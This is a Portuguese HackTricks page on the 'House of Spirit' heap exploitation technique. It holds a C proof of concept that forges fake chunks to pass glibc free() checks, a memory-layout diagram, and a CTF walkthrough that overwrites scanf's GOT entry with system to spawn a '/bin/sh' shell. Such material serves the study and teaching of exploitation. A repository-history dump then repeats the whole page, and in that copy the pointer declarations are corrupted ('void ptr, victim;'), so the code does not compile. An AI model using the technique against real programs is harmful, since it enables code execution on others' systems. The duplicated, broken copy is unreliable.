hacktricks/binary-exploitation/heap/house-of-spirit.md

# Casa do Espírito

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

## Informação Básica

### Código

<details>

<summary>Casa do Espírito</summary>
```c
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>

// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit

struct fast_chunk {
size_t prev_size;
size_t size;
struct fast_chunk *fd;
struct fast_chunk *bk;
char buf[0x20];               // chunk falls in fastbin size range
};

int main() {
struct fast_chunk fake_chunks[2];   // Two chunks in consecutive memory
void *ptr, *victim;

ptr = malloc(0x30);

printf("Original alloc address: %p\n", ptr);
printf("Main fake chunk:%p\n", &fake_chunks[0]);
printf("Second fake chunk for size: %p\n", &fake_chunks[1]);

// Passes size check of "free(): invalid size"
fake_chunks[0].size = sizeof(struct fast_chunk);

// Passes "free(): invalid next size (fast)"
fake_chunks[1].size = sizeof(struct fast_chunk);

// Attacker overwrites a pointer that is about to be 'freed'
// Point to .fd as it's the start of the content of the chunk
ptr = (void *)&fake_chunks[0].fd;

free(ptr);

victim = malloc(0x30);
printf("Victim: %p\n", victim);

return 0;
}
```
</details>

### Objetivo

* Ser capaz de adicionar um endereço ao tcache / fast bin para posteriormente alocá-lo

### Requisitos

* Este ataque requer que um atacante seja capaz de criar alguns chunks falsos indicando corretamente o valor do tamanho e, em seguida, ser capaz de liberar o primeiro chunk falso para que ele entre no bin.

### Ataque

* Criar chunks falsos que contornam as verificações de segurança: você precisará de 2 chunks falsos basicamente indicando nas posições corretas os tamanhos corretos
* De alguma forma, conseguir liberar o primeiro chunk falso para que ele entre no fast ou tcache bin e, em seguida, alocá-lo para sobrescrever esse endereço

**O código de** [**guyinatuxedo**](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) **é ótimo para entender o ataque.** Embora este esquema do código o resuma muito bem:
```c
/*
this will be the structure of our two fake chunks:
assuming that you compiled it for x64

+-------+---------------------+------+
| 0x00: | Chunk # 0 prev size | 0x00 |
+-------+---------------------+------+
| 0x08: | Chunk # 0 size      | 0x60 |
+-------+---------------------+------+
| 0x10: | Chunk # 0 content   | 0x00 |
+-------+---------------------+------+
| 0x60: | Chunk # 1 prev size | 0x00 |
+-------+---------------------+------+
| 0x68: | Chunk # 1 size      | 0x40 |
+-------+---------------------+------+
| 0x70: | Chunk # 1 content   | 0x00 |
+-------+---------------------+------+

for what we are doing the prev size values don't matter too much
the important thing is the size values of the heap headers for our fake chunks
*/
```
{% hint style="info" %}
Note que é necessário criar o segundo chunk para contornar algumas verificações de integridade.
{% endhint %}

## Exemplos

* CTF [https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)
* **Libc infoleak**: Através de um estouro de buffer, é possível alterar um ponteiro para apontar para um endereço GOT a fim de vazar um endereço libc através da ação de leitura do CTF.
* **House of Spirit**: Abusando de um contador que conta o número de "rifles", é possível gerar um tamanho falso do primeiro chunk falso, em seguida, abusando de uma "mensagem", é possível falsificar o segundo tamanho de um chunk e, finalmente, abusando de um estouro de buffer, é possível alterar um ponteiro que será liberado para que nosso primeiro chunk falso seja liberado. Em seguida, podemos alocá-lo e dentro dele haverá o endereço onde a "mensagem" está armazenada. Em seguida, é possível fazer isso apontar para a entrada `scanf` dentro da tabela GOT, para que possamos sobrescrevê-lo com o endereço para o sistema.\
Na próxima vez que `scanf` for chamado, podemos enviar a entrada `"/bin/sh"` e obter um shell.

## Referências

* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)

<details>

<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Outras maneiras de apoiar o HackTricks:

* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
Recreating repository history for branch pt 2024-12-12 12:56:11 +00:00			`# Casa do Espírito`

			`<details>`

			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Outras maneiras de apoiar o HackTricks:`

			`* Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe seus truques de hacking enviando PRs para os repositórios [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`

			`## Informação Básica`

			`### Código`

			`<details>`

			`<summary>Casa do Espírito</summary>`
			```c
			`#include <unistd.h>`
			`#include <stdlib.h>`
			`#include <string.h>`
			`#include <stdio.h>`

			`// Code altered to add som prints from: https://heap-exploitation.dhavalkapil.com/attacks/house_of_spirit`

			`struct fast_chunk {`
			`size_t prev_size;`
			`size_t size;`
			`struct fast_chunk *fd;`
			`struct fast_chunk *bk;`
			`char buf[0x20]; // chunk falls in fastbin size range`
			`};`

			`int main() {`
			`struct fast_chunk fake_chunks[2]; // Two chunks in consecutive memory`
			`void ptr, victim;`

			`ptr = malloc(0x30);`

			`printf("Original alloc address: %p\n", ptr);`
			`printf("Main fake chunk:%p\n", &fake_chunks[0]);`
			`printf("Second fake chunk for size: %p\n", &fake_chunks[1]);`

			`// Passes size check of "free(): invalid size"`
			`fake_chunks[0].size = sizeof(struct fast_chunk);`

			`// Passes "free(): invalid next size (fast)"`
			`fake_chunks[1].size = sizeof(struct fast_chunk);`

			`// Attacker overwrites a pointer that is about to be 'freed'`
			`// Point to .fd as it's the start of the content of the chunk`
			`ptr = (void *)&fake_chunks[0].fd;`

			`free(ptr);`

			`victim = malloc(0x30);`
			`printf("Victim: %p\n", victim);`

			`return 0;`
			`}`
			```
			`</details>`

			`### Objetivo`

			`* Ser capaz de adicionar um endereço ao tcache / fast bin para posteriormente alocá-lo`

			`### Requisitos`

			`* Este ataque requer que um atacante seja capaz de criar alguns chunks falsos indicando corretamente o valor do tamanho e, em seguida, ser capaz de liberar o primeiro chunk falso para que ele entre no bin.`

			`### Ataque`

			`* Criar chunks falsos que contornam as verificações de segurança: você precisará de 2 chunks falsos basicamente indicando nas posições corretas os tamanhos corretos`
			`* De alguma forma, conseguir liberar o primeiro chunk falso para que ele entre no fast ou tcache bin e, em seguida, alocá-lo para sobrescrever esse endereço`

			`O código de [guyinatuxedo](https://guyinatuxedo.github.io/39-house\_of\_spirit/house\_spirit\_exp/index.html) é ótimo para entender o ataque. Embora este esquema do código o resuma muito bem:`
			```c
			`/*`
			`this will be the structure of our two fake chunks:`
			`assuming that you compiled it for x64`

			`+-------+---------------------+------+`
			`\| 0x00: \| Chunk # 0 prev size \| 0x00 \|`
			`+-------+---------------------+------+`
			`\| 0x08: \| Chunk # 0 size \| 0x60 \|`
			`+-------+---------------------+------+`
			`\| 0x10: \| Chunk # 0 content \| 0x00 \|`
			`+-------+---------------------+------+`
			`\| 0x60: \| Chunk # 1 prev size \| 0x00 \|`
			`+-------+---------------------+------+`
			`\| 0x68: \| Chunk # 1 size \| 0x40 \|`
			`+-------+---------------------+------+`
			`\| 0x70: \| Chunk # 1 content \| 0x00 \|`
			`+-------+---------------------+------+`

			`for what we are doing the prev size values don't matter too much`
			`the important thing is the size values of the heap headers for our fake chunks`
			`*/`
			```
			`{% hint style="info" %}`
			`Note que é necessário criar o segundo chunk para contornar algumas verificações de integridade.`
			`{% endhint %}`

			`## Exemplos`

			`* CTF [https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html](https://guyinatuxedo.github.io/39-house\_of\_spirit/hacklu14\_oreo/index.html)`
			`* Libc infoleak: Através de um estouro de buffer, é possível alterar um ponteiro para apontar para um endereço GOT a fim de vazar um endereço libc através da ação de leitura do CTF.`
			* House of Spirit: Abusando de um contador que conta o número de "rifles", é possível gerar um tamanho falso do primeiro chunk falso, em seguida, abusando de uma "mensagem", é possível falsificar o segundo tamanho de um chunk e, finalmente, abusando de um estouro de buffer, é possível alterar um ponteiro que será liberado para que nosso primeiro chunk falso seja liberado. Em seguida, podemos alocá-lo e dentro dele haverá o endereço onde a "mensagem" está armazenada. Em seguida, é possível fazer isso apontar para a entrada `scanf` dentro da tabela GOT, para que possamos sobrescrevê-lo com o endereço para o sistema.\
			Na próxima vez que `scanf` for chamado, podemos enviar a entrada `"/bin/sh"` e obter um shell.

			`## Referências`

			`* [https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit](https://heap-exploitation.dhavalkapil.com/attacks/house\_of\_spirit)`

			`<details>`

			`<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`

			`Outras maneiras de apoiar o HackTricks:`

			`* Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, verifique os [PLANOS DE ASSINATURA](https://github.com/sponsors/carlospolop)!`
			`* Adquira o [swag oficial PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubra [A Família PEASS](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [NFTs](https://opensea.io/collection/the-peass-family)`
			`* Junte-se ao 💬 [grupo Discord](https://discord.gg/hRep4RUj7f) ou ao [grupo telegram](https://t.me/peass) ou siga-nos no Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Compartilhe seus truques de hacking enviando PRs para os repositórios [HackTricks](https://github.com/carlospolop/hacktricks) e [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`

			`</details>`